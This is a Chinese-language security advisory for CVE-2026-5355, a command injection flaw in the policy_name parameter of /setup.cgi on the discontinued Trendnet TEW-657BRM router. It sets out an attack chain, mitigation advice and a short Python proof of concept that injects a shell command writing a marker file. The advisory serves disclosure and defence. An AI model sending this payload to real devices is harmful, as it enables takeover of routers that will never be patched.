CVE-2026-5355 CVSS 6.3 中危

CVE-2026-5355: Trendnet TEW-657BRM OS命令注入漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5355

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Trendnet TEW-657BRM

漏洞概述

Trendnet TEW-657BRM 1.00.1版本存在操作系统命令注入漏洞。该漏洞源于文件/setup.cgi中的vpn_drop函数对policy_name参数处理不当。攻击者无需用户交互，仅需低权限即可通过构造恶意请求远程注入并执行任意操作系统命令。鉴于该产品已停产且厂商不再提供支持，该漏洞无法通过官方补丁修复，存在较高的安全风险。

技术细节

该漏洞位于Trendnet TEW-657BRM路由器的Web管理界面中。受影响的具体文件为/setup.cgi，其中的vpn_drop函数在接收policy_name参数时，缺乏对用户输入的严格过滤。攻击者可以利用这一缺陷，在HTTP请求的参数中注入Shell元字符（如分号或管道符），从而欺骗后端系统执行恶意的操作系统命令。攻击复杂度低，且可远程发起。成功利用此漏洞可能导致攻击者获取设备控制权，进而窃取敏感数据、修改系统配置或发动进一步的内网攻击。厂商已确认该设备自2011年起停止生命周期维护，因此不会发布安全更新。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络，识别出运行固件版本1.00.1的Trendnet TEW-657BRM路由器设备。

STEP 2

漏洞利用

攻击者向目标设备的/setup.cgi接口发送特制的HTTP POST请求，在policy_name参数中注入恶意的Shell命令。

STEP 3

命令执行

由于后端未对输入进行过滤，注入的命令被操作系统解析并执行，攻击者获得设备权限。

STEP 4

建立控制

攻击者利用执行的命令下载后门或修改配置，实现对受害设备的持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    # Target URL pointing to the vulnerable setup.cgi
    url = f"http://{target_ip}/setup.cgi"
    
    # Payload attempting to inject a command using a semicolon
    # The vulnerable parameter is 'policy_name' within the 'vpn_drop' action
    # Example payload: '; touch /tmp/pwned #
    payload = "; echo 'CVE-2026-5355 POC' > /tmp/poc.txt #"
    
    data = {
        "next_page": "",
        "this_page": "",
        "action": "vpn_drop",
        "policy_name": payload
    }
    
    try:
        response = requests.post(url, data=data, timeout=5)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_ip}. Check if command executed.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_poc(target)

影响范围

Trendnet TEW-657BRM 1.00.1

防御指南

临时缓解措施

由于厂商已停止对该产品的支持且不会发布补丁，唯一的彻底解决方案是更换设备。如果必须继续使用，请务必在防火墙上阻断外部对设备管理端口的访问，并修改默认管理密码以降低被自动化脚本攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5355
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5355
3 Details https://www.cvedetails.com/cve/CVE-2026-5355/
4 VulDB https://vuldb.com/cve/CVE-2026-5355
5 Link https://github.com/panda666-888/vuls/blob/main/trendnet/tew-657brm/vpn_drop.md
6 Link https://vuldb.com/submit/781569
7 Link https://vuldb.com/vuln/354708
8 Link https://vuldb.com/vuln/354708/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表